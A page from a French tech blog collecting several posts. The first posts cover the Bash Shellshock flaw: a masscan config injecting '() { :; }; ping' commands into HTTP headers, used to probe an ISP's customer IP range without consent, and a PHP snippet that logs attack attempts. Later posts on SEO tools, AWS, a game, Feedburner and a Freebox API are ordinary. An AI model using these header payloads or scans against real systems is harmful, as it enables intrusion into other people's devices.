Shellshock http header

Vous êtes plusieurs à m'avoir demandé plus d'informations sur la faille Shellshock et l'impact qu'elle peut avoir sur des machines connectées à Internet.

Voici un bref test réalisé sur une plage d'IP /24 d'un DSLAM Free démontant que de nombreuses personnes connectées à Internet semblent être vulnérables à la faille Shellshock découverte récemment sur Bash par un français.

Le test démontré consiste à envoyer à un ensemble de machines/box connectées à Internet un paquet HTTP forgé avec des entêtes HTTP contenant une injection de commande. Toutes les machines vulnérables qui passeront les valeurs des entêtes HTTP sous forme de variables Bash exécuteront la commande indiquée dans la requête sans le vouloir.

Dans le cas présent, l'instruction transmise aux machines est de m'envoyer un Ping réseau. Toutes les machines vulnérables à Shellshock au travers de leur serveur Web obéiront à ma demande et m'enverront un Ping.

Cette attaque est totalement bénin pour les machines distantes, mais elle démontre qu'un grand nombre de machines/box connectées à Internet sont vulnérables à ce type d'attaque.


Soyez très vigilant, il est probable que d'ici les prochains jours des vers / trojans se déploient largement sur le réseau via l'utilisation de cette faille de sécurité importante.

php shellshock

Voici un petit script PHP permettant d'identifier rapidement des tentatives d'attaque Shellshok sur son serveur PHP.

Les attaques se trahissent par la présence des caractères '()' en début de chaîne d'entête HTTP.

<?php

// index.php  à la racine du serveur

function startsWith($haystack, $needle)
{
    return $needle === "" || strpos($haystack, $needle) === 0;
}

if ((startsWith($_SERVER['HTTP_COOKIE'],('()')))
||(startsWith($_SERVER['HTTP_REFERER'],('()')))
|| (startsWith($_SERVER['HTTP_HOST'],('()')))){
   
        // Tentative d'attaque logguée
        file_put_contents('attaques.log', $_SERVER['REMOTE_ADDR'].PHP_EOL,FILE_APPEND);
};

.....

Vous devriez voir le fichier "attaques.log" énormément grossir d'ici les prochains jours. La récente faille détectée dans Bash devrait avoir un impact non négligeable sur le trafic Internet. Des vers utilisant la vulnérabilité Shellshok devraient probablement circuler sur la toile d'ici les prochains jours .

Freebox Shellshock

Après être tombé sur un article intéressant sur l'exploitation à distance de la faille de sécurité "shellshock" trouvée récemment sur Bash par un Français. Je me suis amusé à tester les Freebox et autres boîtiers ADSL connectés à mon DSLAM, le résultat de mon test est assez intéressant inquiétant.

J'ai suivi l'astuce de Robert Graham sur l'utilisation de l'utilitaire masscan pour détecter les machines connectées à Internet vulnérables à la faille de sécurité "Shellshock.

J'ai donc compilé l'application masscan sur mon serveur avec le patch de Robert Graham permettant de modifier des entêtes HTTP.

$ sudo apt-get install git gcc make libpcap-dev
$ git clone https://github.com/robertdavidgraham/masscan
$ cd masscan/src/
$ rm proto-http.c
$ wget https://raw.githubusercontent.com/robertdavidgraham/masscan/master/src/proto-http.c
$ cd ..
$ make

J'ai repris le fichier de configuration de Robert Graham et je l'ai adapté la plage d'IP aux clients de Free connectés à mon DSLAM, l'histoire d'avoir une idée de la sensibilité des box de Free à cette nouvelle faille de sécurité qui secoue actuellement Internet.

target-ip = x.x.x.x/24
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 62.210.208.20
http-header[Host] = () { :; }; ping -c 3 62.210.208.20
http-header[Referer] = () { :; }; ping -c 3 62.210.208.20

Cette configuration de masscan injecte une commande shell dans les entêtes HTTP Cookie, Host et Referer. Si le serveur distant est vulnérable à la faille de sécurité "Shellshock" et que l'une des variables Cookie, Host et Referer est utilisée comme variable d'environnement lors de l'appel à un module CGI, un ping devrait automatiquement arriver sur mon serveur.

Je lance donc deux terminaux sur ma machine. Sur le premier terminal je lance un tcpdump pour afficher toutes les requêtes Ping entrantes et me permettre d'identifier toutes les machines vulnérables.

sudo tcpdump -v icmp

Sur le second terminal, je lance le masscan :

sudo ./masscan -c masscan.conf

Le résultat est assez surprenant, sur la plage d'IP de ma freebox chez Free, je découvre 15 Freebox Révolution allumées acceptant des requêtes sur le port 80. Mais heureusement, aucune d'entre elles ne me ping ... (c'est rassurant).

Cependant, ma machine reçoit 4 pings provenant de 4 box qui semblent être vulnérables à la faille "Shellshock" via l'injection de commandes shell par entêtes HTTP.

Les 4 box détectées ne répondent pas au ping et leurs ports semblent être filtrés (incorrectement si mes requêtes m'ont permis d'exécuter une commande shell sur ces box).

Je n'ai malheureusement pour le moment, aucune idée de quelle box il s'agit. Nmap ne m'a fourni aucune information exploitable ... D'après mes tests, les commandes shell transmises semblent être correctement interprétées par les box distantes, ce qui signifie qu'un cracker pourrait s'introduire sur votre réseau local ou avoir accès à l'ensemble des pages Web sur lesquels vous allez.

S'agit-il de la Freebox V5 ou de la Freebox Crystal ? Ou bien d'un NAS Synology connecté sur le port 80 de la Freebox ?


Update 29/09/2014 20h : Après des tests sur des Freebox V5, le problème ne semble pas se reproduire ... S'agirait-il des box Crystal ?

Update 29/09/2014 22h : Certaines machines localisées au niveau des NRA Free semblent être sensibles à ce type de vulnérabilité

22:55:41.809142 IP ras75-1-vxxx.intf.nra.proxad.net > xxxx.poneytelecom.eu: ICMP host 82.235.59.254 unreachable - admin prohibited filter, length 36

Update 29/09/2014 22h : Adresses IP des box transmises à Free pour analyse, je n'ai aucune idée de quelle version de box il peut s'agir. Sur chaque plage d'IP /24 de DLSAM on en retrouve entre 3 et 5 IP vulnérables

woorank-geek.png

Vous avez un site Internet et vous souhaitez connaitre les impondérables à respecter pour le bon référencement de votre site ?

Woorank fournit un service d'analyse de site en ligne, vous permettant d'identifier en quelques secondes un ensemble d'optimisations techniques possibles.

Le service est gratuit le premier appel, au second rapport Woorank vous demandera d'acheter une licence d'utilisation du service. Un filtrage IP sur la plateforme vous interdit de réaliser deux analyses gratuites successives. Pour obtenir un rapport détaillé, il vous faudra débourser tout de même la somme de 39€ / mois pour un site Internet.

C'est l'outil idéal pour commencer une stratégie SEO et identifier les points techniques faibles de votre site. Le rapport gratuit offre un premier ensemble d'éléments à corriger et vous donnera une note sur 100 pour qualifier la capacité de votre site à être correctement référencé sur les moteurs de recherche.

Pour essayer l'outil, cela se passe ici : http://www.woorank.com

amazon-web-services.png

Amazon Web Services offre actuellement à tout inscrit sur sa plateforme, l'utilisation d'une instance t2.micro pendant 750h par mois sur la durée d'un an. Cette micro-instance est doté de 1 VCPU et de 1 Go de RAM.

Pour bénéficier de cette offre, il suffit de vous inscrire sur le portail AWS et de créer une instance t2.micro éligible. Avant de créer cette instance, n'oubliez pas de choisir le datacenter irlandais au niveau de la barre de menu du site pour éviter de créer une image virtuelle sur des serveurs américains.

En quelques clics vous obtiendrez un serveur Linux ou Windows accessible à distance grâce au certificat généré lors du processus de création de la machine virtuelle. C'est la magie d'Amazon Web Services ;-)

Au sujet d'Amazon Web Services, le nouveau Magic quadrant du Gartner sur les plateformes IaaS a été publié. Amazon Web Services et Microsoft Azure se placent parmi les deux solutions IaaS leaders du marché selon le Gartner.

gartner-mq-iaas-2014.jpg

Amazon Web Services possède un grand pas d'avance par rapport à son petit frère Microsoft Azure, mais cette différence devrait diminuer avec le temps. Microsoft Azure rattrapant petit à petit son retard sur le marché.

Il est vrai qu'Amazon Web Services étoffe de plus en plus sa gamme de services. Aujourd'hui, il est nécessaire de passer plusieurs heures sur le portail AWS avant de comprendre l'ensemble des options et services proposés. Heureusement, 90% des offres proposées répondent à des besoins très spécifiques et ne sont pas forcément nécessaires pour le commun des mortels.

Plus de détails sur l'offre gratuite d'Amazon Web Service.

flykitty-download-fr.png

Ceci n'est pas un billet sponsorisé. Enfin, il va peut-être le devenir si en échange de ce billet je négocie un verre avec son créateur, mon beau-frère ;-)

Je vais faire bref, mon beau-frère vient de lancer son premier jeu sur iOS, Fly Kitty ! : A Flappy Adventure. Il a eu la brillante idée de faire voler un chat sur un deltaplane ... Une vision qu'il a eu un matin en prenant sa douche ?

Fly Kitty! est un jeu d’adresse intégralement en 3D disponible sur iPhone, iPad et iPod Touch, où le joueur doit aider Kitty à atteindre le cœur de la forêt magique à l’aide de son deltaplane ! Pour y arriver, il suffit de taper sur l’écran pour faire voler le chat et éviter les obstacles sur son chemin.

Tout le développement a été réalisé avec Unity. A la première utilisation, attendez-vous à avoir un score proche de 2, avec un peu d'entrainement et si vous êtes adroit de vos doigts, vous pourrez atteindre des scores beaucoup plus importants. Le concept du jeu est simple, il est possible d'y jouer partout avec car les parties se font assez rapidement.

Je vous laisse découvrir ce jeu gratuit sur l'AppStore. N'hésitez pas à laisser un commentaire sur l'AppStore !

Bon vol Kitty !

celio-classement-geek.png

Ne me demandez pas comment j'ai pu obtenir cette troisième place entre le Journal du Geek et Korben au classement des meilleurs blogs High-Tech par Celio, car je n'ai aucune explication rationnelle à vous donner. Non aucune.

Bravo à tous les nominés ! J'ai pu découvrir grâce au classement quelques blogs High-Tech que je ne connaissais pas.

Le mois prochain je pense que je disparaîtrai du classement au profit d'un autre blog High-Tech trouvé au fond de la toile, tout comme moi ;-)

Merci au community manager de Celio d'apprécier mon blog ! Continuez à me lire !

rss mort

Vous connaissez très probablement Feedburner, le service acquis par Google en 2007 pour 100M$ selon les rumeurs et qui permet aux blogs et aux autres sites de centraliser la diffusion de leurs flux RSS. Petite anecdote au passage, ce service a été créé par Dick Costolo, le fondateur de Twitter.

Aujourd'hui, le service Feedburner survit tant bien que mal sur la toile et n'apporte plus aucun chiffre d'affaire à Google depuis que l'option Adsense a été retirée de la plateforme en 2012. Sa feuille de style monocolonne de 800px "has been" commence à dater et plus aucun bug ne semble remonter dans le flux RSS des bugs connus depuis 2013. Tout fait penser que ce service va prochainement disparaître de la toile, comme de nombreux autres.

Feedburner est un problème pour Google, car le jour où ce service disparaît, c'est la majorité des souscriptions de flux sur la toile qui disparaissent. Aujourd'hui, si vous regardez de près les URL des flux RSS que vous suivez, la plupart ont des URL feedburner.

feedburner

Alors pourquoi Google continue-t-il à maintenir ce service opérationnel ? Quelle solution Google peut-il mettre en place pour éviter l'effet "Big Bang" lié la suppression de cette plateforme ?

Il est vrai que Google n'aime pas les flux RSS, car ils réduisent le nombre hit sur les pavés de publicité Adsense, cependant est-ce que le Web peut-il réellement fonctionner sans flux RSS ? Est-ce que le modèle vers lequel pousse Google suite à la suppression pure et dure du service Google Reader est un modèle vers lequel tout le monde veut aller ?

De plus en plus je me dis que nous utilisons le Web d'une manière différente des plus jeunes générations et que les flux RSS sont seulement utilisés par les papys de la toile. Les flux RSS sont donc voués à disparaître avec notre génération ? Est-ce que les réseaux sociaux peuvent réellement remplacer un bon vieux lecteur de flux RSS ?

Pour les webmestres qui veulent anticiper au mieux la mort prochaine de Feedburner, il existe une option cachée dans l'onglet "My Account" qui permet d'avoir la main sur l'URL exposée par Feedburner et de pointer sur son propre domaine.

feedburner

Cette option s'appelle "My Brand" et vous permettra en cas de mort subite de Feedburner, de récupérer tous vos derniers abonnés, mais pas vos abonnés les plus anciens malheureusement.

NB : Si jamais vous êtes abonné à ce blog via l'adresse feedburner de mon flux RSS, vous pouvez vous abonner sur cette nouvelle URL qui migrera toute seule le jour où Feedburner tombera : http://feeds.geeek.org.

Adieu RSS !


Update 22/09/2014 : Le mode de redirection DNS fourni par Feedburner ne semble plus fonctionner correctement.

rebuild nantes

Vous êtes fan des technologies Microsoft ? Faites un tour au ReBUILD le 2 octobre prochain à Nantes.

Le ReBUILD est un salon informatique et communautaire organisé par l'association "Les communautés MS". Ce salon vous propose de rencontrer des experts Microsoft reconnus, de découvrir l’écosystème des partenaires Microsoft et de vous aider à mieux comprendre les produits et les technologies Microsoft pour les intégrer dans vos projets informatiques.

Au programme du ReBUILD 2014 :

  • 1 Conférence plénière​
  • 40 Sessions techniques​
  • 1 concours de développement
  • 15 MVP (Microsoft Most Valuable Profressional) / MSP (Microsoft Student Partner)
  • 38 Speakers
  • 15 Stands partenaires​​

Le programme détaillé des sessions est consultable sur une feuille Excel en ligne, voici la liste synthétique des sujets qui seront abordés lors de cette journée, c'est extrêmement riche :

  • Windows Azure Active Directoy
  • Transformer Excel en solution de BI Libre-service
  • Les fondamentaux de l’architecture SharePoint et ses bonnes pratiques.
  • Innovations autour de Visio 2013
  • Azure et PHP pour vos développements SharePoint 2013/Office 365 : une architecture ouverte et efficace.
  • Développer une Universal App pour Windows Phone 8.1 quand on vient de Silverlight 8.1
  • Intégrer les groupes Yammer et SharePoint pour une meilleure gouvernance
  • Design et expérience utilisateur sous SharePoint 2013
  • De la #ResponsiveOrg aux technologies sociales, l'expérience de travail de demain.
  • De l'usine de développement Visual Studio Online jusqu'à l'hébergement Azure: du Cloud pour plus d'agilité et d'efficacité
  • Windows Azure - Overview
  • Objets connectés: Prenez le contrôle du T1000 avant qu'il ne soit trop tard
  • Designer et animer ses applications Windows Phone avec Blend
  • BYOD : toutes les astuces pour gérer votre parc
  • Créer votre propre scénario de communication avec Lync et Skype
  • Installer Lync en 1 heure avec PowerShell
  • Les nouveautés de Kinect V2
  • Retour d'expérience du Groupe La POSTE - Les outils collaboratifs Microsoft dans le travail de tout les jours
  • Lync comme téléphonie d'entreprise? c'est possible
  • Office 365 et la gestion des identités
  • UX design, comment booster votre taux de conversion
  • Architectures Yammer - Office 365 - SharePoint hybrides oui !Mais pourquoi faire ?
  • SHAREPOINT 2013 : toutes les astuces pour mettre en place un plan de Gouvernance
  • Atelier Tableaux croisés dynamique dans Excel
  • SQL Server 2014: Trois moteurs de stockage pour vos données
  • Xamarin : développement natif unifié Android, iOS, Windows Phone, Windows, Mac, etc
  • Déployer les prérequis Office 365 grâce à Windows InTune
  • Migrer vers Office 365, la ruée vers l'apps
  • Analysez vos usages Yammer, SharePoint et Exchange avec PowerBI
  • Comment réutiliser des composants .NET (Desktop) dans une application Moderne UI et des composants WinRT dans une application Desktop
  • Etes-vous compatible yOS ? Les 5 usages que vous ne pourrez réaliser que sur Office 365 !
  • Mon Windows Phone dans la vie de tous les jours
  • Lync et le monde UC (Universal Communication)
  • Définir une stratégie de migration vers Office 365
  • Coding for Fun - Excel
  • Développer votre activité avec le programme Partenaire Microsoft, le Microsoft Partner Network
  • Tout sur le Social Project Management
  • Implémentation d’un portail citoyen avec Microsoft Dynamics CRM
  • Plongez dans le monde de Visio Services avec Visio 2013

L’événement est totalement gratuit, pour vous inscrire et obtenir un pass, il suffit de vous rendre sur la page Eventbrite de l’événement.

Pour plus d'informations sur cet événement, je vous conseille d'aller faire un petit tour sur la page dédiée à l’événement du ReBUILD.

Inscrivez-vous vite !

freebox_serveur_v6.jpg

Je travaille actuellement sur un projet personnel de box domotique OpenSource basée sur du NodeJS / MongoDB / OpenZwave, le tout hébergé sur un Raspberry Pi. Dans le cadre du développement de cette box domotique, je me suis demandé comment je pouvais activer automatiquement l'alarme et les automatisations quand je pars de ma maison. Je pense avoir trouvé la solution grâce à une API cachée de ma Freebox V6 ....

Vous avez probablement déjà pu le constater en vous connectant sur l'interface Web d'administration de votre Freebox V6 (http://freebox), votre Freebox sait tout de ce qu'il se passe sur votre réseau local.

Vous pouvez depuis cette interface y observer vos PC, mais aussi très probablement votre Smartphone si la configuration Wifi est active. Basé sur ce constat, si chaque habitant possède un smartphone connecté au Wifi, il est donc possible de savoir au travers de la Freebox si quelqu'un est à votre domicile ou non.

En approfondissant un peu plus la documentation des API exposées par la Freebox, on remarquera qu'il est possible pour une application tierce de lister l'ensemble des terminaux connectés sur son réseau local via une API REST qui restitue les mêmes informations que l'interface Web d'administration de la Freebox. Miracle !

GET /api/v3/lan/browser/{interface}/

{
    "success": true,
    "result": [
        {
            "l2ident": {
                "id": "d0:23:db:36:15:aa",
                "type": "mac_address"
            },
            "active": true,
            "id": "ether-d0:23:db:36:15:aa",
            "last_time_reachable": 1360669498,
            "persistent": true,
            "names": [
                {
                    "name": "iPhone-r0ro",
                    "source": "dhcp"
                }
            ],
            "vendor_name": "Apple, Inc.",
            "l3connectivities": [
                {
                    "addr": "192.168.69.20",
                    "active": true,
                    "af": "ipv4",
                    "reachable": true,
                    "last_activity": 1360669498,
                    "last_time_reachable": 1360669498
                }
            ],
            "reachable": true,
            "last_activity": 1360669498,
            "primary_name_manual": true,
            "primary_name": "iPhone r0ro"
        }
    ]
}

Vous l'aurez compris, il ne reste plus qu'à appeler cette API dès lors qu'aucun mouvement est détecté dans la maison. Si jamais plus aucun Smartphone n'est détecté et qu'aucune présence n'est détectée par les détecteurs infrarouges, on peut considérer à 98% que la maison est vide et donc déclencher l'alarme et l'ensemble des automatisations planifiées.

Grâce à cette API, ma maison va donc devenir intelligente. Je n'aurai plus besoin d'informer ma box domotique que je ne suis plus là. Merci Free !